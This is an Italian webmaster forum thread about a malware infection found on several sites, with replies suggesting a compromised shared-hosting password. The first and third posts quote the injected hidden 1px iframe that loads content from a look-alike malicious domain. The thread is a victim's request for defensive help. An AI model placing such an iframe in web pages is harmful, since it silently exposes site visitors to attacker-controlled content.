+ Rispondi alla Discussione
Risultati da 1 a 7 di 7

Malware Google translate

Ultimo Messaggio di Izzyweb il:
  1. #1
    Utente Premium L'avatar di Izzyweb
    Data Registrazione
    May 2006
    Localit
    Sesto Fiorentino
    Messaggi
    868

    Malware Google translate

    Se la sezione sbagliata spostatemi pure il post.
    Ieri mi sono ritrovato un malware dentro tutti i miei siti, si intrufolato dallo script di Google Translate
    Questo la segnalazione di http://sucuri.net/malware/

    Codice:
    http://www.miosito.it//translate.google.com/translate_a/element.js?cb=googleTranslateElementInit
    
    Details: http://sucuri.net/malware/entry/MW:IFRAME:HD202
    <iframe src="http://yahooo.ce.ms/stds/topic.php?sid=1" frameborder="0" width="1px" height="1px">
    A voi risulta questo attacco? In rete non ho trovato ancora niente
    Google+ Seguimi

  2. #2
    Moderatore
    Data Registrazione
    Oct 2009
    Messaggi
    1,282
    Ciao Izzyweb.

    Da quanto scritto su Sucuri all'URL da te postato, sembra che il problema non sia di Google Translate.

    Per quanto ne sappiamo, il virus sembrerebbe essere intrufolato nel sospettissimo sito yahooo.ce.ms (notare la tripla o) dal quale includi un Iframe.

    Non insospettisce anche te?

  3. #3
    Utente Premium L'avatar di Izzyweb
    Data Registrazione
    May 2006
    Localit
    Sesto Fiorentino
    Messaggi
    868
    Ma allora non ho capito da dove entrato!!! Mi sono ritrovato quell'iframe in tutti e quattro i siti subito dopo la chiusura del tag HTML.
    Il messaggio su Sucuri mi aveva confuso, perch lincava il translate di Google.
    Come posso verificare da dove entrato? Esiste un sistema?
    Grazie.

    Codice:
    <iframe src="http://yahooo.ce.ms/stds/topic.php?sid=1" frameborder="0" width="1px" height="1px">
    Ultima modifica di Marco Quadrella; 28-10-11 alle 16:00 Motivo: Maiuscole.
    Google+ Seguimi

  4. #4
    Utente Premium
    Data Registrazione
    Nov 2006
    Messaggi
    862
    Contatta il tuo hoster... potresti aver la password attiva da root. Sei su un hosting condiviso?

  5. #5
    Utente Premium L'avatar di Izzyweb
    Data Registrazione
    May 2006
    Localit
    Sesto Fiorentino
    Messaggi
    868
    Si sono su Hosting condiviso Aruba, in effetti la password della Root la stessa per tutti i miei siti (5). Per aver maggior sicurezza come dovrebbe essere? Cosa dovrei chiedere ad aruba?
    Google+ Seguimi

  6. #6
    Utente Premium
    Data Registrazione
    Nov 2006
    Messaggi
    862
    Citazione Originariamente Scritto da Izzyweb Visualizza Messaggio
    Per aver maggior sicurezza come dovrebbe essere? Cosa dovrei chiedere ad aruba?
    Ho avuto anch'io questo problema su un dedicato managed, l'anno scorso. Sono andato a cercare i ticket per essere pi preciso, ma hanno cambiato sistema di ticket e l'archivio non c' pi.

    In pratica ora si accede ad ogni account con una password specifica e robusta. Io l'ho potuta disabilitare tramite Cpanel, non so che pannello hai e se, soprattutto, questo il problema... comunque essendo un hosting condiviso puoi certamente contattare l'assistenza...
    Ultima modifica di Marco Quadrella; 28-10-11 alle 18:43 Motivo: Usa comunque, non cmq.

  7. #7
    Utente Premium L'avatar di Izzyweb
    Data Registrazione
    May 2006
    Localit
    Sesto Fiorentino
    Messaggi
    868
    Grazie 444523
    Sei stato preziosissimo, adesso chiedo lumi all'assistenza di Aruba.
    Google+ Seguimi

+ Rispondi alla Discussione

^ Permessi di Scrittura

  • Tu non puoi inviare nuove discussioni
  • Tu non puoi inviare risposte
  • Tu non puoi inviare allegati
  • Tu non puoi modificare i tuoi messaggi
  •  
  • Il codice BB Attivato
  • Le faccine sono Attivato
  • Il codice [IMG] Attivato
  • Il codice [VIDEO] Attivato
  • Il codice HTML Disattivato
  • Trackbacks Attivato
  • Pingback Attivato
  • Refback Attivato

SEO by vBSEO 3.6.0 PL2 ©2011, Crawlability, Inc.